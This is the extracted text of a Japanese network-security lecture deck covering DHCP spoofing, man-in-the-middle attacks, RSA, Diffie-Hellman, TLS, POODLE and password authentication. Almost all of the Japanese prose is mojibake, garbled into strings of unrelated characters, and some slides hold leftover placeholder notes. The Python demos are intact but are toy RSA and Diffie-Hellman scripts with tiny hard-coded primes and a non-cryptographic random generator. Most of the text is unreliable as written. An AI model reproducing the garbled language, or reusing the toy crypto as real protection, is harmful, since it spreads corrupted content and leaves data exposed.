ѱҙ͋Δୈࡾऀ
ͬͪͩ͜Α
DHCP OFFER
Alice
Slide 140
Slide 140 text
8J'J
Πϯλʔωοτ ଓઌ
ϗςϧͷWiFiΞΫηεϙΠϯτʹଓ͠·͢
ѱҙ͋Δୈࡾऀ
σʔλͷྲྀΕ
͜ͷΑ͏ͳ߈ܸDHCPεϓʔϑΟϯάͱݺΕΔ
Alice
Slide 141
Slide 141 text
ѱҙ͋Δୈࡾऀ͕ؒʹڬ·Δํ๏͍͔ͭ͋͘Δ͕
ଓઌ͔Β͜͏ͨ͠ঢ়ଶΛະવʹ͙ज़ແ͍ͨΊ
ΠϯλʔωοτΛհͨ͠௨৴
ؒʹѱҙ͋Δୈࡾऀ͕͍Δͷͱͯ͠
௨৴Λߦ͏ඞཁ͕͋Δ
Slide 142
Slide 142 text
ΠϯλʔωοτݴήʔϜͩ
ԕ͘ͷϗετʹͨͲΓணͨ͘Ίʹ
ͨ͘͞ΜͷϗετΛܦ༝͢ΔՄೳੑ͕͋Δ
ଓઌ
ܦ༝ͨ͠ϗετͷΛhopͱݺͿ
1hop 2hop 3hop 4hop 5hop
Slide 143
Slide 143 text
ΠϯλʔωοτݴήʔϜͩ
௨৴ܦ࿏্ʹ͋Δશͯͷϗετʹ
௨৴༰ؙ͕ݟ͑Ͱ͋Δ
ଓઌ
Slide 144
Slide 144 text
ΠϯλʔωοτݴήʔϜͩ
௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ
࣍ͷϗετʹਖ਼͘͠௨৴༰Λ͑ͳ͍͔͠Εͳ͍
ଓઌ
Slide 145
Slide 145 text
ΠϯλʔωοτݴήʔϜͩ
௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ
ຊདྷͷ௨৴૬खʹͳΓ͢·͔͢͠Εͳ͍
Bob
Bob͞ΜͰ͔͢ ͍Bob͞ΜͰ͢
Charlie
Alice
Slide 146
Slide 146 text
ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
ӨڹΛड͚ͳ͍ͨΊʹ
௨৴༰Λ҉߸Խ
௨৴༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
Slide 147
Slide 147 text
ڞ௨伴҉߸
H e l l o , sp W o r l d ! nl
48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
m 8 can dc1 si vt n 9 n del : syn M f R +
ed 38 98 11 8f 0b 6e 39 6e ff ba 16 4d e6 52 2b
H e l l o , sp W o r l d ! nl
48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
伴Λͬͯม
伴Λͬͯٯม
ͲͷΑ͏ʹม͢Δ͔ʹҧ͍͕͋Δ
ෳͷ҉߸ΞϧΰϦζϜ͕ଘࡏ͢Δ
Slide 148
Slide 148 text
ྑ͍ڞ௨伴҉߸ͱ
ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
શͯͷ伴Λࢼ͢ΑΓޮͷྑ͍ղಡํ๏͕ଘࡏ͠ͳ͍
͜ΕΛূ໌͢Δͷ͕ࠔ
͜Ε伴Λ͘͢Ε࣮ݱͰ͖Δ
Slide 149
Slide 149 text
ΞϧΰϦζϜ͕͘ར༻͞Ε͍ͯͯ
ͦΕͰޮͷྑ͍ղಡํ๏͕ൃݟ͞Ε͍ͯͳ͍҉߸
গͳ͘ͱࠓͷͱ͜Ζ҆શͰ͋Δͱߟ͑ΒΕΔ
҉߸ΞϧΰϦζϜΛࣗ࡞͢Δͱ
͜ͷ෦Λຬͨ͢ͷ͕ࠔʹͳΔ
∴҉߸ΞϧΰϦζϜͷࣗ࡞ΦεεϝͰ͖ͳ͍
্هͷ݅Λຬͨ͢
طଘͷ҉߸ΞϧΰϦζϜΛ࠾༻͠Α͏
Slide 150
Slide 150 text
ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
͘ར༻͞Ε͍ͯΔ͚Ͳ
ޮͷྑ͍ղಡํ๏͕ݟ͔͍ͭͬͯͳ͍ڞ௨伴҉߸
Advanced Encryption Standard (AES)
Blowfish
ͳͲͳͲ
ϒϩοΫ҉߸
ετϦʔϜ҉߸
Chacha20
Slide 151
Slide 151 text
ڞ௨伴҉߸ͷ伴ૹ
҉߸ΛΓऔΓ͢ΔͨΊʹ伴͕ඞཁ
͔͠͠҉߸Խͱ෮߸ʹಉ͡伴Λ͍ͬͯΔ߹
౪ௌͷՄೳੑ͕͋Δ௨৴खஈΛͬͯ૬खʹ伴Λͤͳ͍
ѱҙ͋Δୈࡾऀʹ伴͕όϨ͍ͯͨΒ
҉߸ͷҙຯ͕ͳ͍ Bob
Alice
Slide 152
Slide 152 text
ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
ӨڹΛड͚ͳ͍ͨΊʹ
௨৴༰Λ҉߸Խ
௨৴༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
NEW!
Slide 153
Slide 153 text
ެ։伴҉߸
୭͔͕ެ։伴Λ౪ௌ͍ͯͨ͠ͱͯ͠
ͦͷ伴Ͱ௨৴༰Λ෮߸͢Δ͜ͱͰ͖ͳ͍
෮߸͢Δͷʹඞཁͳ
ൿີ伴
ଞਓʹڭ͑ͳ͍
҉߸Խͱ෮߸ʹҟͳΔ伴Λ͏҉߸ΞϧΰϦζϜ
҉߸Խʹඞཁͳ
ެ։伴
Λ௨৴૬खʹૹΔ
௨৴૬खެ։伴Λͬͯ
伴ͷओʹૹΓ͍ͨϝοηʔδΛ҉߸Խ͢Δ
Slide 154
Slide 154 text
ެ։伴҉߸
=15
=-15 =42
=57
42+15=57
57-15=42
͜Μͳ҉߸ͩͱ
ҰॠͰެ։伴͔Βൿີ伴͕όϨͯ͠·͏
ൿີ伴͔Βެ։伴؆୯ʹ࡞Εͳ͚ΕͳΒͳ͍͕
ެ։伴͔Βൿີ伴༰қʹ࡞ΕͯͳΒͳ͍
Slide 155
Slide 155 text
RSA
ൿີ伴͔Βެ։伴؆୯ʹ࡞Εͳ͚ΕͳΒͳ͍͕
ެ։伴͔Βൿີ伴༰қʹ࡞ΕͯͳΒͳ͍
373*61=22753Ͱ͋Δ͜ͱ؆୯ʹٻ·Δ͕
22753͕373ͱ61ʹղͰ͖Δ͜ͱΛ
ಉ͘͡Β͍؆୯ʹٻΊΔํ๏ΒΕ͍ͯͳ͍
ૉҼղ͕ඞཁ
͜ͷΑ͏ʹܭࢉྔ͕ରশͰͳ͍ܭࢉΛڬΜͰ伴Λ࡞Δ͜ͱͰ
ެ։伴͔Βൿີ伴Λ࡞Ζ͏ͱ͢Δͱ
େͳܭࢉ͕ඞཁʹͳΔΑ͏ͳ伴Λ࡞ΕΔ
Slide 156
Slide 156 text
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def egcd( x, y, a = 0, b = 1 ):
div, mod = divmod( x, y )
if mod == 0:
return ( y, a )
return egcd( y, mod, b - div * a, a )
def modinv( x, y ):
a, b = egcd( x, y )
if a != 1:
raise Exception( 'no modinv')
return b % y
def generate_key_pair():
prime_nums = [ 116903, 215443, 139721 ]
public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ]
private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) )
return ( public_key, private_key )
public_key, private_key = generate_key_pair();
print( 'ൿີ伴:\t%d' % private_key )
print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
plain = 0x686f6765
print( 'ݪจ:\t%X' % plain )
crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
print( '҉߸Խ:\t%X' % crypted )
decrypted = pow( crypted, private_key, public_key[ 0 ] )
print( '෮߸:\t%X' % decrypted )
$ ./crypto.py
ൿີ伴: 15753325457
ެ։伴: 25185933029,139721
ݪจ: 686F6765
҉߸Խ: 2779B8996
෮߸: 686F6765
RSA
Slide 157
Slide 157 text
def egcd( x, y, a = 0, b = 1 ):
div, mod = divmod( x, y )
if mod == 0:
return ( y, a )
return egcd( y, mod, b - div * a, a )
def modinv( x, y ):
a, b = egcd( x, y )
if a != 1:
raise Exception( 'no modinv')
return b % y
def generate_key_pair():
prime_nums = [ 116903, 215443, 139721 ]
public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ]
private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) )
return ( public_key, private_key )
public_key, private_key = generate_key_pair();
print( 'ൿີ伴:\t%d' % private_key )
print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
plain = 0x686f6765
print( 'ݪจ:\t%X' % plain )
crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
print( '҉߸Խ:\t%X' % crypted )
decrypted = pow( crypted, private_key, public_key[ 0 ] )
print( '෮߸:\t%X' % decrypted )
$ ./crypto.py
ൿີ伴: 15753325457
ެ։伴: 25185933029,139721
ݪจ: 686F6765
҉߸Խ: 2779B8996
෮߸: 686F6765
RSA
͋Δnͱૉͳ1Ҏ্nະຬͷ
ࣗવͷΛٻΊΔؔΛ
ΦΠϥʔͷτʔγΣϯτؔφ(n)ͱݺͿ
ૉͷఆٛΑΓn͕ૉͷ߹φ(n)n-1ʹͳΔ
φ(ab)=φ(a)φ(b)ʹͳΔ͜ͱ͕ΒΕ͍ͯΔ
aͱbΛ͍ͬͯΔͱφ(ab)ఆ࣌ؒͰٻ·Δ͕
ab͔͠Θ͔Βͳ͍߹φ(ab)ࢦ࣌ؒΛཁ͢Δ
͜ͷඇରশੑΛͬͯެ։伴͔Βൿີ伴ΛٻΊΔͷΛࠔʹ͢Δ
Slide 158
Slide 158 text
ެ։伴ΛૉҼղ͢Εൿີ伴ʹͨͲΓண͚Δ
༰қͰͳ͍͕
૯ͨΓͰ伴Λ୳͢ΑΓ࣌ؒͰߦ͑ͯ͠·͏
Slide 159
Slide 159 text
ૉҼղେ͖ͳʹͳΔఔܭࢉʹ͕͔͔࣌ؒΔ
ݱ࣮తͳ࣌ؒͰܭࢉͰ͖ͳ͍Α͏ͳେ͖ͳΛ伴ͱ͢Δ͜ͱͰ
ൿີ伴͕όϨΔͷΛ͙
RSAͷ߹伴768bitҎԼͷͷ
ݱ࣮తͳ࣌ؒͰൿີ伴͕ٻ·ͬͯ͠·͏ࣄ͕ΒΕ͍ͯΔ
͜ͷΑ͏ͳݹ͍伴ΑΓ͍伴ʹߋ৽͠ͳ͚ΕͳΒͳ͍
ެ։伴҉߸ͷ伴ૉҼղʹ͔͔Δ࣌ؒͰܾΊΔ
Slide 160
Slide 160 text
Bob
Charlie
தؒऀ߈ܸ
ѱҙ͋Δୈࡾऀͱ҆શʹ௨৴Ͱ͖ΔΑ͏ʹͳͬͯ͠·ͬͨ!
Bob͞ΜͰ͔͢ ͍Bob͞ΜͰ͢
௨৴૬ख͕ຊͰ͋Δ͜ͱΛ͔֬Ίͳ͚ΕͳΒ͍
Slide 161
Slide 161 text
ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
ӨڹΛड͚ͳ͍ͨΊʹ
௨৴༰Λ҉߸Խ
௨৴૬ख͕ຊ͔Ͳ͏͔֬ೝ
௨৴༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
NEW!
Slide 162
Slide 162 text
Bob
ೝূہ
BobຊਓͰ͋Δ͜ͱΛ
ཧతͳํ๏Ͱ֬ೝͯ͠
ൿີ伴Λൃߦ
ެ։伴Λऔಘ
αʔόূ໌ॻ
ެ։伴Λͬͯ҉߸Խͨ͠σʔλ
ຊͷBob͚͕ͩಡΊΔ
ԿΒ͔ͷཧ༝ͰBobͷൿີ伴͕
ଞਓͷखʹͬͯ͠·ͬͨ߹
ೝূہͦͷ伴Λࣦޮͤ͞Δ
Slide 163
Slide 163 text
Transport Layer Security
ུͯ͠TLS ੲSSLͱݺΕ͍ͯͨ
͜ΕΒͷػೳΛ࣋ͬͨ௨৴࿏Λ࡞ΔͨΊͷن֨
RFCͰඪ४Խ[1]͞Ε͓ͯΓOpenSSLͳͲͷ࣮͕ଘࡏ͢Δ
࣌ͱͱʹ҆શͳ҉߸มΘΔͨΊTLS༷ʑͳ҉߸ٕज़Λαϙʔτ͍ͯ͠Δ
[1] https://www.ietf.org/rfc/rfc5246.txt
௨৴༰Λ҉߸Խ
௨৴૬ख͕ຊ͔Ͳ͏͔֬ೝ
௨৴༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
Slide 164
Slide 164 text
Transport Layer Security
ཧ
σʔλϦϯΫ
TCP/IP
௨৴Λߦ͏ΞϓϦέʔγϣϯ
TLS
TLSΛ͏ΞϓϦέʔγϣϯ
TLSʹ௨৴σʔλΛ͢
TLS௨৴૬खͷ֬ೝɺ伴ڞ༗Λߦ͍
҉߸Խͯ͠ϋογϡΛ͚ͭͨσʔλΛ
TCP/IPͷιέοτʹྲྀ͢
TLSͷ্ʹΞϓϦέʔγϣϯΛ࡞ΔࣄͰ
҉߸ʹؔ͢Δ໘ࣄΛ
ࣗͰ࣮͢Δඞཁ͕ͳ͘ͳΔ
Slide 165
Slide 165 text
RSAΛ༻͍ͨTLS
ެ։伴Λऔಘ
nΛެ։伴Ͱ҉߸Խͯ͢͠
͋ΔཚnΛ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
༗ޮͳެ։伴Ͱ҉߸Խͨ͠Λ྆ऀͰڞ༗Ͱ͖ͨͱ͍͏͜ͱ
ڞ௨伴ҙਤͨ͠௨৴૬खͷΈͱڞ༗͞Εͨঢ়ଶʹ͋Δ
ຊͷ௨৴૬ख
ൿີ伴Ͱ
nΛऔΓग़ͤΔ
Bob
Alice
Slide 166
Slide 166 text
RSAΛ༻͍ͨTLS
औಘ
nΛެ։伴Ͱ҉߸Խͯ͢͠
͋ΔཚnΛ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
͜ͷ࣌ͷ௨৴Λه͍ͯ͠Δୈࡾऀ͕͍ͨͱ͢Δ
͜ͷ࣌Ͱڞ௨伴҉߸ͷ伴ൿີ伴Θ͔Βͳ͍ͨΊ
ୈࡾऀ௨৴ͷ༰ΛΔ͜ͱ͕Ͱ͖ͳ͍
Bob
Alice
Slide 167
Slide 167 text
nΛެ։伴Ͱ҉߸Խͯ͢͠
͋ΔཚnΛ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
nΛͱʹ
ڞ௨伴Λ࡞Δ
ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
ୈࡾऀอଘ͓͍ͯͨ͠௨৴༰͔Β
ڞ௨伴ΛऔΓग़ͯ͠
શͯͷ௨৴༰ΛΔ͜ͱ͕Ͱ͖Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
Slide 168
Slide 168 text
nΛެ։伴Ͱ҉߸Խͯ͢͠
͋ΔཚnΛ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
nΛͱʹ
ڞ௨伴Λ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
ϑΥϫʔυηΩϡϦςΟ
௨৴͕ߦΘΕͨޙͰαʔόূ໌ॻͷൿີ伴͕όϨͯ
ͦΕ·ͰʹߦΘΕͨ௨৴༰͕όϨͳ͍Α͏ʹ͢Δ͜ͱ
RSAͰڞ༗伴ͷૉΛ௨৴૬खʹૹΔͱ
ϑΥϫʔυηΩϡϦςΟΛ࣮ݱͰ͖ͳ͍
ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
ୈࡾऀอଘ͓͍ͯͨ͠௨৴༰͔Β
ڞ௨伴ΛऔΓग़ͯ͠
શͯͷ௨৴༰ΛΔ͜ͱ͕Ͱ͖Δ
Slide 169
Slide 169 text
ࢄର
G = xa mod p (ͨͩ͠pૉͰ 2 ≦ a < p)
͜ͷΑ͏ͳࣜʹ͓͍ͯ
xͱaͱp͔ΒGର࣌ؒͰٻ·Δ͕
xͱGͱp͔ΒaΛٻΊΔʹࢦ࣌ؒΛཁ͢Δ
ಛʹp͕ڊେͳૉͷ߹
aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ
Slide 170
Slide 170 text
Diffie-Hellman伴ڞ༗
G = xa mod p (ͨͩ͠pૉͰ 2 ≦ a < p)
͜ͷΑ͏ͳࣜʹ͓͍ͯ
xͱaͱp͔ΒGର࣌ؒͰٻ·Δ͕
xͱGͱp͔ΒaΛٻΊΔʹࢦ࣌ؒΛཁ͢Δ
͜ͷඇରশੑΛͬͯ௨৴ܦ࿏্ʹݟ͑Δใ͚ͩͰ
༰қʹ伴ΛٻΊΒΕͳ͍Α͏ʹ͢Δ
ಛʹp͕ڊେͳૉͷ߹
aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ
Slide 171
Slide 171 text
Diffie-Hellman伴ڞ༗
͋ΔཚaΛ࡞Δ ͋ΔཚbΛ࡞Δ
Ga = xa mod p Gb = xb mod p
n = Gba mod p n = Gab mod p
nͲͪΒͷܭࢉํ๏Ͱ
ಉ͡ʹͳΔ
nΛͱʹ
ڞ௨伴Λ࡞Δ
nΛͱʹ
ڞ௨伴Λ࡞Δ
͜͜Ͱަ͞ΕΔGa Gb
͔Β
aͱbΛΔࣄͰ͖ͳ͍
Slide 172
Slide 172 text
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
random.seed()
# pͱxࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
p=152219 # ҙͷૉ
x=2 # 2Ҏ্pະຬͷҙͷࣗવ
# ͜ͷ௨৴ʹͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
secret1=random.randint(2,p)
secret2=random.randint(2,p)
print( u'Alice͕࡞ͬͨൿີͷ: %d' % secret1 )
print( u'Bob͕࡞ͬͨൿີͷ: %d' % secret2 )
# ͜ͷ௨৴Ͱ૬खʹ͢ = ౪ௌऀʹݟ͑Δ
public1=pow( x, secret1, p )
public2=pow( x, secret2, p )
print( u'Alice͔ΒBobʹૹΔ: %d' % public1 )
print( u'Bob͔ΒAliceʹૹΔ: %d' % public2 )
# ͜ͷ͕Ұக͢Δ
key1=pow( public2, secret1, p )
key2=pow( public1, secret2, p )
print( u'Alice͕Bob͔ΒͬͨͰ࡞ͬͨ: %d' % key1 )
print( u'Bob͕Alice͔ΒͬͨͰ࡞ͬͨ: %d' % key2 )
Diffie-Hellman伴ڞ༗
$ ./dh.py
Alice͕࡞ͬͨൿີͷ: 118909
Bob͕࡞ͬͨൿີͷ: 89005
Alice͔ΒBobʹૹΔ: 26981
Bob͔ΒAliceʹૹΔ: 123319
Alice͕Bob͔ΒͬͨͰ࡞ͬͨ: 7243
Bob͕Alice͔ΒͬͨͰ࡞ͬͨ: 7243
Slide 173
Slide 173 text
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
random.seed()
# pͱxࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
p=152219 # ҙͷૉ
x=2 # 2Ҏ্pະຬͷҙͷࣗવ
# ͜ͷ௨৴ʹͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
secret1=random.randint(2,p)
secret2=random.randint(2,p)
print( u'Alice͕࡞ͬͨൿີͷ: %d' % secret1 )
print( u'Bob͕࡞ͬͨൿີͷ: %d' % secret2 )
# ͜ͷ௨৴Ͱ૬खʹ͢ = ౪ௌऀʹݟ͑Δ
public1=pow( x, secret1, p )
public2=pow( x, secret2, p )
print( u'Alice͔ΒBobʹૹΔ: %d' % public1 )
print( u'Bob͔ΒAliceʹૹΔ: %d' % public2 )
# ͜ͷ͕Ұக͢Δ
key1=pow( public2, secret1, p )
key2=pow( public1, secret2, p )
print( u'Alice͕Bob͔ΒͬͨͰ࡞ͬͨ: %d' % key1 )
print( u'Bob͕Alice͔ΒͬͨͰ࡞ͬͨ: %d' % key2 )
Diffie-Hellman伴ڞ༗
$ ./dh.py
Alice͕࡞ͬͨൿີͷ: 118909
Bob͕࡞ͬͨൿີͷ: 89005
Alice͔ΒBobʹૹΔ: 26981
Bob͔ΒAliceʹૹΔ: 123319
Alice͕Bob͔ΒͬͨͰ࡞ͬͨ: 7243
Bob͕Alice͔ΒͬͨͰ࡞ͬͨ: 7243
7243ͱ͍͏Λڞ༗Ͱ͖ͨ
͜ͷΛͱʹͯ͠ڞ௨伴҉߸ͷ伴Λ࡞Δ͜ͱ͕Ͱ͖Δ
Slide 174
Slide 174 text
Diffie-Hellman Ephemeral
Ұ࣌త
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
random.seed()
# pͱxࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
p=152219 # ҙͷૉ
x=2 # 2Ҏ্pະຬͷҙͷࣗવ
# ͜ͷ௨৴ʹͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
secret1=random.randint(2,p)
secret2=random.randint(2,p)
print( u'Alice͕࡞ͬͨൿີͷ: %d' % secret1 )
print( u'Bob͕࡞ͬͨൿີͷ: %d' % secret2 )
# ͜ͷ௨৴Ͱ૬खʹ͢ = ౪ௌऀʹݟ͑Δ
public1=pow( x, secret1, p )
public2=pow( x, secret2, p )
print( u'Alice͔ΒBobʹૹΔ: %d' % public1 )
print( u'Bob͔ΒAliceʹૹΔ: %d' % public2 )
# ͜ͷ͕Ұக͢Δ
key1=pow( public2, secret1, p )
͜ͷΛ伴ڞ༗Λߦ͏ʹ
มߋ͢Δ
͜ͷ͕ແ͍ͱ伴Λ
ಛఆͰ͖ͳ͍͕
͜ͷࣗମ౪ௌͰ͖ͳ͍ͨΊ
ϑΥϫʔυηΩϡϦςΟ͕ಘΒΕΔ
ൿີͷ͕ຖճมΘΔͷͰ૬ख͕ຊ͔Ͳ͏͔ͷ֬ೝ͕Ͱ͖ͳ͘ͳΔ
૬ख͕ຊͰ͋Δ͜ͱͷ֬ೝRSAΛͬͯߦ͏
Slide 175
Slide 175 text
DHE-RSA-AES256-SHA256
TLS͕Diffie-Hellman伴ڞ༗Λ͍ͬͯΔ͔Ͳ͏͔
TLSͷ҉߸εΠʔτ໊ΛݟΕΘ͔Δ
ڞ௨伴ͷڞ༗ʹ
Diffie-Hellman Ephemeral
Λ͏
௨৴૬ख͕ຊͰ͋ΔࣄΛ
RSAͰ͔֬ΊΔ
256bitͷAESΛͬͯσʔλΛ҉߸Խ͢Δ
σʔλͷվ͟ΜΛݕग़͢ΔͨΊʹڞ௨伴ͱσʔλͷ
SHA-256ϋογϡΛ͏
Slide 176
Slide 176 text
ପԁࢄର
ࢄର
ର࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δͷʹ
ࢦ࣌ؒΛཁ͢ΔͰ͋Δ
ٯࢉͰ͖ͳ͍Θ͚Ͱͳ͍ͷͰ
ेେ͖ͳΛͬͯٯࢉʹ͕͔͔࣌ؒΔΑ͏ʹ͢Δඞཁ͕͋Δ
ପԁࢄର
ର࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δํ๏͕ΒΕ͍ͯͳ͍
ٯࢉ͢Δํ๏͕ൃݟ͞Εͳ͍ݶΓ
૯ͨΓ߈ܸʹ͑ΒΕΔఔͷେ͖͞ͷͰྑ͍
Slide 177
Slide 177 text
ପԁۂઢDiffie-Hellman伴ڞ༗
ࢄରͷΘΓʹପԁࢄରΛ͏
Diffie-Hellman伴ڞ༗
TLSʹ͓͍ͯ
Elliptic Curve Diffie-Hellman Ephemeral
ུͯ͠ECDHEͱදه͞ΕΔ
ݱ࣌Ͱ౪ௌऀʹݱ࣮తͳ࣌ؒͰ伴ΛΒΕͳ͍ͨΊʹ
RFC7525Ͱਪ͞Ε͍ͯΔͷେ͖͞
%J⒏F)FMMNBO伴ڞ༗ ପԁۂઢ%J⒏F)FMMNBO伴ڞ༗
CJU CJU
https://tools.ietf.org/html/rfc7525
Slide 178
Slide 178 text
͜͜·Ͱͷ͕Α͔͘Βͳ͔ͬͨਓʹ
͓͍֮͑ͯͯཉ͍͠ࣄ
౪ௌऀʹใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ͏ͷ͍͠
ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ͓͏
Slide 179
Slide 179 text
TLSྺ࢙͋ΔϓϩτίϧͳͷͰ
ࠓͰ҆શͱݴ͑ͳ͍҉߸ٕज़ʹରԠ͍ͯ͠Δ
TLSଓ࣌ʹαʔόͱΫϥΠΞϯτ͕͑Δ҉߸ٕज़Λௐͯ
྆ऀ͕ରԠ͍ͯ͠Δ҉߸ٕज़Ͱ௨৴ΛࢼΈΔ
ྫ͑ࠓͰݱ࣮తͳ࣌ؒͰղಡͰ͖Δ512bitͷRSARC4ʹରԠ͍ͯ͠Δ
SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
com
ing
soon
1994 1996 1999 2006 2008
Slide 180
Slide 180 text
ಡΊΔ
SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
com
ing
soon
1994 1996 1999 2006 2008
2010ʹೖͬͯݹ͍҉߸Λબͤͯ
ݹ͍҉߸ͷऑΛಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ
ΠϚυΩͷ҉߸OK
ΠϚυΩͷ҉߸ແཧ
ऑ͍҉߸ ऑ͍҉߸
Alice Bob
౪ௌऀ
Slide 181
Slide 181 text
POODLE(CVE-2014-3566)
https://nvd.nist.gov/vuln/detail/CVE-2014-3566
2010ʹೖͬͯݹ͍҉߸Λબͤͯ
SSL 3.0ͷن্֨ͷऑΛಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
͜͜ʹ
/*45ʹΑΔ100%-&ͷղઆΛషΔ
Slide 182
Slide 182 text
SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
com
ing
soon
1994 1996 1999 2006 2008
TLS 1.3ͰࠓͰ҆શͰͳ͍҉߸ٕज़͕࠷ॳ͔Β༻ෆೳʹͳΔ
TLS1.3͕ҰൠతʹͳΔ·Ͱ
TLS 1.2͕࣋ͭػೳͷ͏ͪ
ةݥͱ͞Ε͍ͯΔػೳΛͬͨঢ়ଶͰӡ༻
SSL 3.0ͷΑ͏ͳຊʹݹ͍҉߸͔͠ରԠ͍ͯ͠ͳ͍௨৴૬ख
௨৴ΛఘΊͯΒ͏͔͠ͳ͍
Slide 183
Slide 183 text
RFC7525
Recommendations for Secure Use of Transport Layer Security (TLS)
and Datagram Transport Layer Security (DTLS)
TLS 1.2ͷػೳͷ͏ͪ
ԿΛ͓͖͔͕ͬͯ͘
·ͱΊΒΕ͍ͯΔ
IUUQTUPPMTJFUGPSHIUNMSGD
ඇެࣜͳຊޠ༁IUUQTTVNNFSXJOEKQEPDTSGD
͜͜ʹ
3'$ͷ"CTUSBDUΛషΔ
Slide 184
Slide 184 text
͜͜·Ͱͷ͕Α͔͘Βͳ͔ͬͨਓʹ
͓͍֮͑ͯͯཉ͍͠ࣄ
౪ௌऀʹใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ͏ͷ͍͠
ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ͓͏
TLSΛ͏࣌
ࠓͰ҆શͰͳ͍ݹ͍ػೳΛΖ͏
NEW!
Slide 185
Slide 185 text
ຊͷϢʔβͱ
ِͷϢʔβΛݟ͚Δ
Slide 186
Slide 186 text
ೝূ
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ
"MJDFͰ͢
"MJDFͰ͢
αʔό͕ຊ͔Ͳ͏͔Λ͔֬ΊΔ࣌ͱҧ͍
Ϣʔβূ໌ॻΛ͍࣋ͬͯͳ͍
Slide 187
Slide 187 text
ύεϫʔυೝূ
ύεϫʔυ
Ͱ͢
ݹ͔͘Βར༻͞Ε͍ͯΔϢʔβͷೝূํ๏
ຊͷ"MJDFͳΒ
ύεϫʔυΛ͍ͬͯΔഺ
ʜ
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ
Slide 188
Slide 188 text
ύεϫʔυೝূͷ
ʜΕ·ͨ͠
͍ΖΜͳαʔϏεʹ͍ΖΜͳύεϫʔυΛઃఆ͍ͯͨ͠Β
ϢʔβύεϫʔυΛΕΔ
ຊͷ"MJDFͳΒ
ύεϫʔυΛ͍ͬͯΔഺ
ʜ
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ
Slide 189
Slide 189 text
ൿີͷ࣭
